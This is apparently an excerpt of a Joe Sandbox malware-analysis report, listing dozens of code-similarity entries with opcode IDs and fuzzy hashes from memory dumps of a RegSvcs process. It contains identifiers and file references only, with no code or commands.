                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                              • Instruction ID: 9a7f9125b4a3b4a864cc93e86b7e4fb32c1929f95c68063d2852c9edf0b96dd6
                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                              • Instruction Fuzzy Hash: E521083AB00652A6EF15AB958D10AFEBBB5EF40710F40C01AFAD587691EB39DD40D3B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d56236c236098e7597ea6d91b207244af68f0abef0d2d5ce73874f457abe192c
                                                                                              • Instruction ID: 9c5be417b80ef54e63c14d36c843fd042d96e10190d70887b3db0bde36fcc3c0
                                                                                              • Opcode Fuzzy Hash: d56236c236098e7597ea6d91b207244af68f0abef0d2d5ce73874f457abe192c
                                                                                              • Instruction Fuzzy Hash: 23310836A0012C9BDB31EF14DC41FEE77BAEF15750F0901A6E645AB390D6749E80AF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                              • Instruction ID: f822817ad50043dd9548282a30f8039f8823dd76a5d4476d96ee3891ce679980
                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                              • Instruction Fuzzy Hash: A9218031A00709EBCB11CF58C980A8EBBA5FF48758F108465EE55DF255D779EA058B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d186e24faa2be9034e3feaa2b929b6b5219ff6c7dc75ad19f4a03c4ed72221df
                                                                                              • Instruction ID: 8ef4ad0d795f49ec52cbbabe22fa9049f90eadb5866dbc69a2a4e7ff5b2f97f5
                                                                                              • Opcode Fuzzy Hash: d186e24faa2be9034e3feaa2b929b6b5219ff6c7dc75ad19f4a03c4ed72221df
                                                                                              • Instruction Fuzzy Hash: 1721D2726047459BCB22CF18C880B6B77E4FF88760F014569FD949B696D734E901CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                              • Instruction ID: 2da9686d831c2dd8a8837f17c057990d9308966e83fa575412c53734d65334d3
                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                              • Instruction Fuzzy Hash: DE318A31600604AFD721DB68C884F6AB7FAEF85354F1445AAE5528B391E770EE01EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 82328f9cf91daee8055b73eb392f1e684a58eb9f6030c033ed3d871042e1bfe4
                                                                                              • Instruction ID: 9d0a909f63eae620cdc4e313eb6736a05b7349c0281ee7bd0953bb6b8bbab879
                                                                                              • Opcode Fuzzy Hash: 82328f9cf91daee8055b73eb392f1e684a58eb9f6030c033ed3d871042e1bfe4
                                                                                              • Instruction Fuzzy Hash: 1E315E796002059FCB54CF18C8849EFB7F5EF88384B15845AECC99B391EB71EA50CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc88bc10cf9c52a1f6de6c995be360abe961e5ae5246a4cfe085ab8b9c705588
                                                                                              • Instruction ID: 6f723795ac70b9fb0a633c39c2ddfafe807c92ee23e54eccbcf976e46ba002ce
                                                                                              • Opcode Fuzzy Hash: dc88bc10cf9c52a1f6de6c995be360abe961e5ae5246a4cfe085ab8b9c705588
                                                                                              • Instruction Fuzzy Hash: 5421A071D006299BCF24DF59C881ABEB7F8FF48740B550069F981E7254D778AD41DBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 71bedde8166c7d1a051c06373f855c897cd6d201d59306cfe1aded8fd2d5b4e8
                                                                                              • Instruction ID: 40f231e5044bb0509daf705ff86040de6d4dc0fe7686d40d15dfc2e8c4329b0c
                                                                                              • Opcode Fuzzy Hash: 71bedde8166c7d1a051c06373f855c897cd6d201d59306cfe1aded8fd2d5b4e8
                                                                                              • Instruction Fuzzy Hash: DE218971600649ABD715DB68DC80E6AB7E8FF48740F1400A9FA44DB6A1D638EE40CBA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d11663b220e1160c2ceeecfeaaf1762ff6eb809a13b87736fc91e6267c88ca5
                                                                                              • Instruction ID: efe309a48dd69d158ae1397a592eaad66f8907235029b7dd4e3d45d358ea2057
                                                                                              • Opcode Fuzzy Hash: 7d11663b220e1160c2ceeecfeaaf1762ff6eb809a13b87736fc91e6267c88ca5
                                                                                              • Instruction Fuzzy Hash: 1021C5729443469FD712DF59C944BABBBECEF90740F084496BEC0C7265D734DA04C6A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 090e46c74094246c413a8ebd067a38f19b0d31597bedc5702eed62f75ce648ca
                                                                                              • Instruction ID: a701366dbd5319b415a45e62fced8baa8f2019b530c6c5001df2712fc343cf8d
                                                                                              • Opcode Fuzzy Hash: 090e46c74094246c413a8ebd067a38f19b0d31597bedc5702eed62f75ce648ca
                                                                                              • Instruction Fuzzy Hash: 5021D771785685DBF323676C8C48B293BD4AF41774F2903F4FAE29B6E2DB68D9018210
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64238e50b13172829fe29138f75523ae9f02791b66fa9cbbfe08001608b4e609
                                                                                              • Instruction ID: a2c89703e12e0195c1bf4645e17ed4ebe602736f75655dde1f0cb95b0513f454
                                                                                              • Opcode Fuzzy Hash: 64238e50b13172829fe29138f75523ae9f02791b66fa9cbbfe08001608b4e609
                                                                                              • Instruction Fuzzy Hash: 7621AF35241741DFC725DF29CC01B5677F5AF08704F1484A8A589CB761E335E942CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1d6934396dd05206991b05ab420ad34ecadbeb6567bcf46f74843c747a7d25c
                                                                                              • Instruction ID: a248d1a7d56c708409c1cce26233c9f7233088a36449d4a9d11d2b312bfc65f5
                                                                                              • Opcode Fuzzy Hash: e1d6934396dd05206991b05ab420ad34ecadbeb6567bcf46f74843c747a7d25c
                                                                                              • Instruction Fuzzy Hash: 6F113632380A15FFEB2256599C51F6B7A99DBC4BB0F100128B788DB290EF70EC01A695
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0211e99c81ac7547ac065b6e580147f4e941b4e4cb622c8415af4b9e644185f
                                                                                              • Instruction ID: 3cd6cc6ec6a4bf5a069c5fe6dd7ee27265f2bef3793551de0f52254594a4172a
                                                                                              • Opcode Fuzzy Hash: a0211e99c81ac7547ac065b6e580147f4e941b4e4cb622c8415af4b9e644185f
                                                                                              • Instruction Fuzzy Hash: 922116B1E40309ABCB20CFAAD9819AEFBF9FF98710F10416FE445E7244DA749941CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                              • Instruction ID: 30282480201a123e4b6e6dc269a6c91daf1c98c4f4433e1da93af74b4f885f83
                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                              • Instruction Fuzzy Hash: 1D218C72A00209EFDF129F98DC44BAEBBF9EF88310F21485AF994A7251D734DA50DB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                              • Instruction ID: 8491101303f69fcfd6adc948bdb771c98b4e3268a1e78115c69620a13a958e74
                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                              • Instruction Fuzzy Hash: BB110473640609BFE7229F84CD41F9ABBB9EF84754F104069F6848B194D779EE84CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ebd843122e57f23a637c4c899e3a67d9a4bdc942074dd9762db8825b54733a84
                                                                                              • Instruction ID: 37148d720229b3125576e6f2c8be30ec99e0f7f01f6dcd5a52fef6913ab3319d
                                                                                              • Opcode Fuzzy Hash: ebd843122e57f23a637c4c899e3a67d9a4bdc942074dd9762db8825b54733a84
                                                                                              • Instruction Fuzzy Hash: EC119835B016919FCB11DF4BC9C0A56B7E5AF467A4724406DED0C9F205DAB2DD02D790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                              • Instruction ID: 36936fda466b373ae3bc4a0806fecbe6fdb01399c8d578c0c1517550b3db2a24
                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                              • Instruction Fuzzy Hash: 39217F71A01681DFDB758F49C580A66BBE6FB84B10F15887DE58597616C738ED01CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b35bfc11886c38e2a5feb8a8e2dbf888640068a2347ad83f50b9a81cb96b58d3
                                                                                              • Instruction ID: 93185240c3aa355fd5a167ba0374374fcb767509bda8c0cde34f4735723615a5
                                                                                              • Opcode Fuzzy Hash: b35bfc11886c38e2a5feb8a8e2dbf888640068a2347ad83f50b9a81cb96b58d3
                                                                                              • Instruction Fuzzy Hash: 24218E32A40245DFCB14CF59C581B6EBBB5FB88358F20416DD109A7310CB75AD07DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 28f24f77c63410dd9dec575ed2449ea5b537262783613e1e0d452d7e9cda1c57
                                                                                              • Instruction ID: 65605e1b59d935c86dd70a28096caef9638ee9b4699800522a9257784f3bf444
                                                                                              • Opcode Fuzzy Hash: 28f24f77c63410dd9dec575ed2449ea5b537262783613e1e0d452d7e9cda1c57
                                                                                              • Instruction Fuzzy Hash: 2F218C75600A00EFD7608F68CC81BAAB7F8FF44350F04882DE5EAC7251EAB5A940CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2d7cc3e1c8db7beba27eb6717b3cd12a54e83e001b413abeb3bf270d018e12ab
                                                                                              • Instruction ID: 5ab4e29d8123e510c802c056218f38cae8fc996e37176451c1720410530a25f9
                                                                                              • Opcode Fuzzy Hash: 2d7cc3e1c8db7beba27eb6717b3cd12a54e83e001b413abeb3bf270d018e12ab
                                                                                              • Instruction Fuzzy Hash: 63110132640A05EFE722CB59CC40F9A77ACEF89B50F114065F282DB261DA72ED00C7A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10e24e8f2e5949f94de27a25a4d34f5c3142b8cc0b742624ec25b6f8bf3f4348
                                                                                              • Instruction ID: d92ebef3b01251c972e66fdde3c6e2f1daf34133eceecdb629d0bbff12494a1a
                                                                                              • Opcode Fuzzy Hash: 10e24e8f2e5949f94de27a25a4d34f5c3142b8cc0b742624ec25b6f8bf3f4348
                                                                                              • Instruction Fuzzy Hash: 2E1104723001199FDB1ADB28CD81A6F7297EFC5370F254979EA62DB291E9319802C690
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef2a3470fceeff006879be1c5cb22e3d566e007c66301e0423f44192bd0fcc72
                                                                                              • Instruction ID: 28b3a80e19b6813acba483259ee661a58bec88bfc5c07e763d4672aa61e61699
                                                                                              • Opcode Fuzzy Hash: ef2a3470fceeff006879be1c5cb22e3d566e007c66301e0423f44192bd0fcc72
                                                                                              • Instruction Fuzzy Hash: E011E376A01208DFCB65CF59DD80A5ABBF4FF84710B0640BDE9859B319E6B9DD00DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction ID: 26c59ee47454a9459897829d99f478ebe6122a362bcf88cca811e6d65b362cb5
                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction Fuzzy Hash: 1C110436A00909EFDB19CB98CC11B9DBBF5EF84310F058269E88597380E675EE01CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                              • Instruction ID: 7495c763a508cfe0ccc97efa017fab5166c7142ab7f0dd8855c513106f8fb68c
                                                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                              • Instruction Fuzzy Hash: 1F2106B5A00B459FD3A0CF29D481B52BBF4FB48B20F10492EE98AC7B50E771E854CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction ID: 8b3df985b80004f031c038eb471a661c0a3367890205fab17b1cc57e8fdc481d
                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction Fuzzy Hash: 0E119E3A600700EFEB61DF49C840B5ABBE9EF45750F058469FA8D9B160DB75DD40DBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 823b5f8e03b011fbf077edf85f841450b49c27da9f914b1b1d54ce9fe9559f90
                                                                                              • Instruction ID: 5eef829056fe421326a6c8925506dbdbf102860bfebb6c04c317d3f61038f6ad
                                                                                              • Opcode Fuzzy Hash: 823b5f8e03b011fbf077edf85f841450b49c27da9f914b1b1d54ce9fe9559f90
                                                                                              • Instruction Fuzzy Hash: 7F01C875746648EBF317626D9C88F6B7BDCEF40354F0500B5F9828B291D954DD00C361
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4bfbbac6f43353fcdcc377d72b7e830fa7c2307a2846508499bdef6f9652816c
                                                                                              • Instruction ID: 2744fdf3de8a783e33af7c1978c5923bf7ba498e5293670718d24681beb23ba0
                                                                                              • Opcode Fuzzy Hash: 4bfbbac6f43353fcdcc377d72b7e830fa7c2307a2846508499bdef6f9652816c
                                                                                              • Instruction Fuzzy Hash: B611AC36644684AFCB25CF5AD880B567BA9EB86B64F10411AF954CB290C774FC40EFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a820227721fbbc3f2f1ac1f96c941e4229b4b813f3b6f61c80b18610c0a81868
                                                                                              • Instruction ID: 8c4c635dbd10a31aa91daf343c937b24b74986865464f5eae204d085c1de503f
                                                                                              • Opcode Fuzzy Hash: a820227721fbbc3f2f1ac1f96c941e4229b4b813f3b6f61c80b18610c0a81868
                                                                                              • Instruction Fuzzy Hash: 2C11C272A00715AFDB21DF99CD80B5EFBF8EF88740F510894EA41B7205D77AAD018B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd2e2b88fddac1b3f95355a1cfbfa8a5f905ea5854c6d2a256c3459e067183b9
                                                                                              • Instruction ID: 6b05e349cbd77e9d65e1f14f376253647d7ce4b7cae7eb55c74a2ae7ddae4cbf
                                                                                              • Opcode Fuzzy Hash: bd2e2b88fddac1b3f95355a1cfbfa8a5f905ea5854c6d2a256c3459e067183b9
                                                                                              • Instruction Fuzzy Hash: 4A01F5716012099FD726DF19D904F56BBF9FB86314F2085AAF5449B2A1CB74EC82CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction ID: f066a6f41e182ffb9a8da8cfa45e60d894f03b49f2875ba5610e52a77e8f51f3
                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction Fuzzy Hash: C611E5B22016C69BF723972CC994B297BD4AF00748F1908F0EEC1A7693F729C842C250
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction ID: 7c0adc2f05dfa2a6b524a9a7ac8ab292df4d9558b4f89b1b11ccea2ce09c7169
                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction Fuzzy Hash: F701C03A600305AFEB21DB59CC00B9A7AEDFF40B50F158065FA859B260E779DD40D790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction ID: a00f362ec6bd6c488375a9ffa8d06bf3cd0bcf0c831c86dd584a269707fe9f6a
                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction Fuzzy Hash: F2012632904B119BCB308F16D840A367BE6EF55B71708892EFC958B780C331D800EB65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a2c827c19edb2fec9c2d8dda169cfaaac8ff77bbf8f0ba735af89c78f9c26699
                                                                                              • Instruction ID: 22683632c940f859fe314e4301a8117d3524dd91a9894d020ee53c210b0448a4
                                                                                              • Opcode Fuzzy Hash: a2c827c19edb2fec9c2d8dda169cfaaac8ff77bbf8f0ba735af89c78f9c26699
                                                                                              • Instruction Fuzzy Hash: 8211A131241640EFDB66EF19DD91F56BBB8FF44B84F1000A5FD459B6A1C635EE01CA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51403c177500f9986afdbf61155dba9c9fa0cc18077e3ee10aa97eb75b56335a
                                                                                              • Instruction ID: 87b25ad20a4d95bff14bc4b73596efe684b8f9383b458f64ce8d6670afa657ee
                                                                                              • Opcode Fuzzy Hash: 51403c177500f9986afdbf61155dba9c9fa0cc18077e3ee10aa97eb75b56335a
                                                                                              • Instruction Fuzzy Hash: BC115A7194122DABDF26AB64CD52FE9B2B4AF18710F5041D4A358E60E0DA709E81DF84
